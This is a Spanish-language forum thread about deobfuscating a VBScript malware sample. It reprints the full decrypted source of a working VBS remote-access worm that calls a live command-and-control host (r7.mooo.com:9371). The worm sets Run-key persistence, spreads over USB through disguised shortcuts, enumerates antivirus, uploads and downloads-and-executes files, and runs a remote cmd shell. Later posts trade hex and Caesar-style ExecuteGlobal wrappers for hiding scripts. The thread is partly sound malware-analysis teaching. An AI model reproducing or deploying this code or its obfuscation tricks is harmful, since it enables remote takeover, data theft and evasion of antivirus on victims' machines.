ŸYŒŒ——85—ž"'K™šŸKš£ŽYžŸYŒŸ™š'žŸŒ˜KŸ"™85KKKŒŒ——'š˜Œ™¤KhKš£ŽYžŸYŒŒ——85—žK85KKKŒŒ——'š˜Œ™¤KhKMM85™K"'8585Ž˜ž"——KhKŒŒ——'š˜Œ™¤85™K' ™ŽŸ"š™"))
sddfskcIdCLcsoSkso()
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
next
executeglobal hsDCcocssccCaVICC
End Function
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1
bLen = Left(sStr, i)
dcssLdchdcdDCsiijSS = i
Loop While sStr <> bLen
End Function
Gracia de antemano. :laugh:
Pues lo bueno de aquí, es que puedes ver como se decifra el string encodeado, así hay que seguir la secuencia:
La string encodeada:
dDssDajcooSLscaC = ((""šžŸKhKMbY˜šššYŽš˜M85›šŸKhKd^b
Está es la función para descifrar el encode, a modo de ejemplo sólo tome los primeros 2 caracteres del encode, que en realidad serian 5
dDssDajcooSLscaC = ((""š"))
msgbox dcssLdchdcdDCsiijSS(dDssDajcooSLscaC)
Function dcssLdchdcdDCsiijSS(sStr)
Do
i = i + &H1 ' &H1 Es hexadecimal que equivale a 1, es decir, incrementa la variable i de 1 en 1, manteniendo el valor
bLen = Left(sStr, i) ' Recorre el encode de izquierda al valor incrementado de i
dcssLdchdcdDCsiijSS = i ' Devuelve el valor real del tamaño de la cadena encodeada
Loop While sStr <> bLen
End Function
La siguiente función es la que se encarga de descifrar el valor del encode, veamos:
Function sddfskcIdCLcsoSkso()
For i = 1 to dcssLdchdcdDCsiijSS(dDssDajcooSLscaC) ' Toma la función anterior para obtener el tamaño real del encode
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
Next
ExecuteGlobal hsDCcocssccCaVICC ' Ejecución del encode
End Function
En la Linea 3, es donde esta el decifrado el usa las siguientes funciones:
CHRW ' devuelve un carácter Unicode; sin embargo, en los sistemas que no son compatibles con el conjunto de caracteres Unicode, la función se comporta de forma idéntica a CHR.
ASC ' Convierte el primer carácter de una cadena en código ANSI y devuelve el resultado.
MID ' Devuelve un número específico de caracteres de una cadena.
Veamos la conversión con las dos primeros caracteres del encode,
[AHORA SIGO xD]
Esta es una técnica muy usada en malware vbs o cualquier otro tipo de script y es bien sencillo obtener el decifrado, lo unico que se necesita es sustituir la linea #7:
executeglobal hsDCcocssccCaVICCpor las siguientes:
Set file = fso.CreateTextFile("D:\decrypted.txt", True)
file.write(hsDCcocssccCaVICC)
file.closeLuego en "decrypted.txt" estará el código descifrado del malware. Aquí lo paso luego de descifrarlo y arreglar algún que otro caracter. Es básicamente una variante de un malware que analice hace ya algún tiempo en mi blog (https://reversec0de.wordpress.com/2013/10/12/analizando-el-malware-mugen-vbs/)
(AVISO: NO EJECUTAR DIRECTAMENTE EN EL S.O PRINCIPAL, ESTA ES UNA MUESTRA REAL DE UN MALWARE REAL. Avisados quedan todos)
host = "r7.mooo.com"
port = 9371
installdir = "%appdata%"
lnkfile = true
lnkfolder = false
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce
on error resume next
instance
while true
install
response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
param = cmd (1)
execute param
case "update"
param = cmd (1)
oneonce.close
set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
oneonce.write param
oneonce.close
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
wscript.quit
case "uninstall"
uninstall
case "send"
download cmd (1),cmd (2)
case "site-send"
sitedownloader cmd (1),cmd (2)
case "recv"
param = cmd (1)
upload (param)
case "enum-driver"
post "is-enum-driver",enumdriver
case "enum-faf"
param = cmd (1)
post "is-enum-faf",enumfaf (param)
case "enum-process"
post "is-enum-process",enumprocess
case "cmd-shell"
param = cmd (1)
post "is-cmd-shell",cmdshell (param)
case "delete"
param = cmd (1)
deletefaf (param)
case "exit-process"
param = cmd (1)
exitprocess (param)
case "sleep"
param = cmd (1)
sleep = eval (param)
end select
wscript.sleep sleep
wend
sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon
upstart
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
if filesystemobj.fileexists (drive.path & "\" & installname) then
filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4
end if
for each file in filesystemobj.getfolder( drive.path & "\" ).Files
if not lnkfile then exit for
if instr (file.name,".") then
if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 2+4
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\")
if instr (fileicon,",") = 0 then
lnkobj.iconlocation = file.path
else
lnkobj.iconlocation = fileicon
end if
lnkobj.save()
end if
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
if not lnkfolder then exit for
folder.attributes = 2+4
foldername = folder.name
set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk")
lnkobj.windowstyle = 7
lnkobj.targetpath = "cmd.exe"
lnkobj.workingdirectory = ""
lnkobj.arguments = "/c start " & replace(folder.name," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\")
if instr (foldericon,",") = 0 then
lnkobj.iconlocation = folder.path
else
lnkobj.iconlocation = foldericon
end if
lnkobj.save()
next
end If
end If
end if
next
err.clear
end sub
sub uninstall
on error resume next
dim filename
dim foldername
shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true
for each drive in filesystemobj.drives
if drive.isready = true then
if drive.freespace > 0 then
if drive.drivetype = 1 then
for each file in filesystemobj.getfolder ( drive.path & "\").files
on error resume next
if instr (file.name,".") then
if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
file.attributes = 0
if ucase (file.name) <> ucase (installname) then
filename = split(file.name,".")
filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
else
filesystemobj.deletefile (drive.path & "\" & file.name)
end If
else
filesystemobj.deletefile (file.path)
end if
end if
next
for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
folder.attributes = 0
next
end if
end if
end if
next
wscript.quit
end sub
function post (cmd ,param)
post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function
function information
on error resume next
if inf = "" then
inf = hwid & spliter
inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter
inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set os = root.execquery ("select * from win32_operatingsystem")
for each osinfo in os
inf = inf & osinfo.caption & spliter
exit for
next
inf = inf & "plus" & spliter
inf = inf & security & spliter
inf = inf & usbspreading
information = inf
else
information = inf
end if
end function
sub upstart ()
on error resume Next
shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
function hwid
on error resume next
set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
if disk.volumeserialnumber <> "" then
hwid = disk.volumeserialnumber
exit for
end if
next
end function
function security
on error resume next
security = ""
set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for x = 1 to ubound (versionstr)
osversion = osversion & versionstr (i)
next
osversion = eval (osversion)
if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"
set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)
for each objantivirus in colantivirus
security = security & objantivirus.displayname & " ."
next
if security = "" then security = "nan-av"
end function
function instance
on error resume next
usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then
usbspreading = "true - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
else
usbspreading = "false - " & date
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ"
end if
end If
upstart
set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort = filesystemobj.getfile (installdir & installname)
if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then
shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
wscript.quit
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if err.number > 0 then wscript.quit
end function
sub sitedownloader (fileurl,filename)
strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
sub download (fileurl,filedir)
if filedir = "" then
filedir = installdir
end if
strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
set objfsodownload = createobject ("scripting.filesystemobject")
if objfsodownload.fileexists (strsaveto) then
objfsodownload.deletefile (strsaveto)
end if
if objhttpdownload.status = 200 then
dim objstreamdownload
set objstreamdownload = createobject("adodb.stream")
with objstreamdownload
.type = 1
.open
.write objhttpdownload.responsebody
.savetofile strsaveto
.close
end with
set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if
end sub
function upload (fileurl)
dim httpobj,objstreamuploade,buffer
set objstreamuploade = createobject("adodb.stream")
with objstreamuploade
.type = 1
.open
.loadfromfile fileurl
buffer = .read
.close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function
function enumdriver ()
for each drive in filesystemobj.drives
if drive.isready = true then
enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function
function enumfaf (enumdir)
enumfaf = enumdir & spliter
for each folder in filesystemobj.getfolder (enumdir).subfolders
enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next
for each file in filesystemobj.getfolder (enumdir).files
enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter
next
end function
function enumprocess ()
on error resume next
set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)
dim objitem
for each objitem in colitems
enumprocess = enumprocess & objitem.name & "|"
enumprocess = enumprocess & objitem.processid & "|"
enumprocess = enumprocess & objitem.executablepath & spliter
next
end function
sub exitprocess (pid)
on error resume next
shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub
sub deletefaf (url)
on error resume next
filesystemobj.deletefile url
filesystemobj.deletefolder url
end sub
function cmdshell (cmd)
dim httpobj,oexec,readallfromany
set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
readallfromany = oexec.stderr.readall
else
readallfromany = ""
end if
cmdshell = readallfromany
end function
Muy bueno gracias . ya entendí.
una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:
msgbox "prueba de cifrado"
como lo encriptaria con por lo menos 3 capas de cifrado ?
Cita de: **Aincrad** en 22 Octubre 2017, 16:55 PM
Muy bueno gracias . ya entendí.
una pregunta : y si quiero usar esa técnica de cifrado en por lo menos este script:
msgbox "prueba de cifrado"
como lo encriptaria con por lo menos 3 capas de cifrado ?
Por lo que veo, es cifrado CAESAR: https://en.wikipedia.org/wiki/Caesar_cipher (https://en.wikipedia.org/wiki/Caesar_cipher)
Cita de: **Aincrad** en 19 Octubre 2017, 15:59 PM
***
hsDCcocssccCaVICC = hsDCcocssccCaVICC & ((CHRW(ASC((MID(dDssDajcooSLscaC, i))) - ASC("+"))))
***
No es difícil implementar ese cifrado con las pasadas que quieras.
Saludos!
ah , ok .
bueno yo convierto el texto a hex y me baso en este viejo virus wsf .
<?XML version="1.0"?><job>
<script language="VBScript">
<![CDATA[
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
ExecuteGlobal FACEBOOKFACEBOOK
Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
]]>
</script>
</job>
el code que pase a hex fue msgbox "hola" que al pasarlo quedo
6D7367626F782022686F6C6122 y como me base en este code puedo codificar cualquier vbs.
y en cualquier caso para descifrar el code , según lo que me acaban de explicar quedaría asi:
<?XML version="1.0"?><job>
<script language="VBScript">
<![CDATA[
FACEBOOKFACEBOOK = FACEBOOKFACEBOOK & php("6D7367626F782022686F6C6122")
Function php(FACEBOOKFACEBOOK) : For y = 1 To Len(FACEBOOKFACEBOOK) Step 2 : ub = ub & Chr(Clng("&H" & Mid(FACEBOOKFACEBOOK, y, 2))) : Next : php = ub : End Function
Set fso = CreateObject("scripting.filesystemobject")
Set fichero = fso.CreateTextFile("decrypted.txt", True)
fichero.write(FACEBOOKFACEBOOK)
fichero.close
]]>
</script>
</job>
Gracias por las explicaciones . . ;-)